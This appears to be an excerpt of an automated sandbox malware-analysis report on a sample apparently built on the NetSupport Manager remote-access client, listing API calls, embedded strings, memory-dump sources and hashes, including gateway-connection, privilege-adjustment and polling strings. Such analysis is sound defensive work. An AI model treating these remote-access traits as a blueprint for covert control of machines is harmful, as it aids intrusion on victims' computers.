                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                      • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                      • API String ID: 3874234733-2061581830
                                                                                      • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                      • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

Control-flow Graph for the function at 6c5da980 (rendered graph not reproduced in this text)
APIs
  • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
• EnterCriticalSection.KERNEL32(6C61B898,?,00000000,00000000), ref: 6C5DAA11
• LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA58
• LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA68
• LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA94
• WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C5DAB0B
• socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB4E
• WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB5A
• #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB8E
• #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABB1
• #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABE3
• bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC18
• WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC21
• closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC29
• htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC65
• WSASetBlockingHook.WSOCK32(6C5D63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC76
• WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC8F
• WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC96
• closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC9C
• WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DACFD
• WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD04
• closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD0A
• WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD45
• EnterCriticalSection.KERNEL32(6C61B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD4F
• InitializeCriticalSection.KERNEL32(-6C61CB4A), ref: 6C5DADE6
  • Part of subcall function 6C5D8FB0: _memset.LIBCMT ref: 6C5D8FE4
  • Part of subcall function 6C5D8FB0: getsockname.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D9005
• getsockname.WSOCK32(00000000,?,?), ref: 6C5DAE4B
• LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAE60
• GetTickCount.KERNEL32 ref: 6C5DAE6C
• InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DAE7A
Strings
• Cannot connect to gateway %s, error %d, xrefs: 6C5DACA6
• Connect error to %s using hijacked socket, error %d, xrefs: 6C5DAB17
• *TcpNoDelay, xrefs: 6C5DABB8
• Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C5DAD14
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
• String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
• API String ID: 692187944-2561115898
• Opcode ID: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
• Instruction ID: fb70bedb50f581ab446862bef5ac2d3b9a14edd6e83d34ccd58adfe83e01b611
• Opcode Fuzzy Hash: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
• Instruction Fuzzy Hash: 5EE18F71A01219DFDB14DF68CC80BDEB3B5EB88305F1141AAE91A97A80DB70AE49CF55

Control-flow Graph for the function at 11139090 (rendered graph not reproduced in this text)
APIs
• GetCurrentThreadId.KERNEL32 ref: 111390C7
• IsWindow.USER32(00030496), ref: 11139125
• IsWindowVisible.USER32(00030496), ref: 11139133
• IsWindowVisible.USER32(00030496), ref: 1113916B
• GetForegroundWindow.USER32 ref: 11139186
• EnableWindow.USER32(00030496,00000000), ref: 111391A0
• EnableWindow.USER32(00030496,00000001), ref: 111391BC
• SetForegroundWindow.USER32(00000000), ref: 111391CB
• FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
• IsWindowVisible.USER32(00000000), ref: 11139218
• IsWindowVisible.USER32(00030496), ref: 11139248
• IsIconic.USER32(00030496), ref: 11139255
• GetForegroundWindow.USER32 ref: 1113925F
  • Part of subcall function 11131210: ShowWindow.USER32(00030496,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
  • Part of subcall function 11131210: ShowWindow.USER32(00030496,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
• SetForegroundWindow.USER32(00000000), ref: 11139285
• EnableWindow.USER32(00030496,00000001), ref: 11139294
• GetLastError.KERNEL32 ref: 11139353
• GetLastError.KERNEL32 ref: 111393CB
• GetTickCount.KERNEL32 ref: 11139678
• GetTickCount.KERNEL32 ref: 11139699
  • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
• FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
• String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
• API String ID: 2511061093-2542869446
• Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
• Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
• Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
• Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                      APIs
                                                                                      • #16.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D924C
                                                                                      • WSAGetLastError.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D925B
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D9274
                                                                                      • Sleep.KERNEL32(00000001,00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D92A8
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D92B0
                                                                                      • Sleep.KERNEL32(00000014), ref: 6C5D92BC
                                                                                      Strings
                                                                                      • ReadSocket - Connection has been closed by peer, xrefs: 6C5D92E0
                                                                                      • ReadSocket - Error %d reading response, xrefs: 6C5D92F7
                                                                                      • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C5D922B
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5D9226
                                                                                      • ReadSocket - Would block, xrefs: 6C5D928A
                                                                                      • a3^l, xrefs: 6C5D9244
                                                                                      • *RecvTimeout, xrefs: 6C5D927B
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: CountSleepTick$ErrorLast
• String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3^l$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
• API String ID: 2495545493-3425134272

APIs
• GetSystemTime.KERNEL32(?,?,?,939E354D,6E272756,939E34B3,FFFFFFFF,00000000), ref: 6C5E31E2
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E31EC
• GetSystemTime.KERNEL32(?,6E272756,939E34B3,FFFFFFFF,00000000), ref: 6C5E322A
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E3234
• EnterCriticalSection.KERNEL32(6C61B898,?,939E354D), ref: 6C5E32BE
• LeaveCriticalSection.KERNEL32(6C61B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C5E32D3
• GetCurrentThreadId.KERNEL32 ref: 6C5E334D
  • Part of subcall function 6C5EBA20: __strdup.LIBCMT ref: 6C5EBA3A
  • Part of subcall function 6C5EBB00: _free.LIBCMT ref: 6C5EBB2D
Strings
Yara matches
Similarity
• API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
• String ID: 1.1$ACK=1$CMD=POLL$INFO=1
• API String ID: 1510130979-3441452530

APIs
• CoInitialize.OLE32(00000000), ref: 11115BC5
• CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
• GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
• SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
• FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
• CoUninitialize.COMBASE(00000000), ref: 11115CD1
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
• String ID: SHELL32.DLL$SHGetSettings
• API String ID: 4195908086-2348320231

APIs
Strings
Yara matches
Similarity
• API ID: _memset
• String ID: NBCTL32.DLL$_License$serial_no
• API String ID: 2102423945-35127696

APIs
• SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
Strings
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420

APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,111EEB64,?,00000001,00000001), ref: 1109E990
• EqualSid.ADVAPI32(?,00C22EB8,?,00000001,00000001), ref: 1109E9A3
Yara matches
Similarity
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0

APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109D46D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 2349140579-0

APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
• CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                      • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                      • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                      • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                        • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                      • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                      • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                      • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                      • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                        • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                      • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                      • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                      • SetWindowPos.USER32(00030496,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                      • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                      • wsprintfA.USER32 ref: 1102FFA5
                                                                                      • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,A1BC2D8B,00000002,74DF2EE0), ref: 1112820A
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                        • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                      • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$051829$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 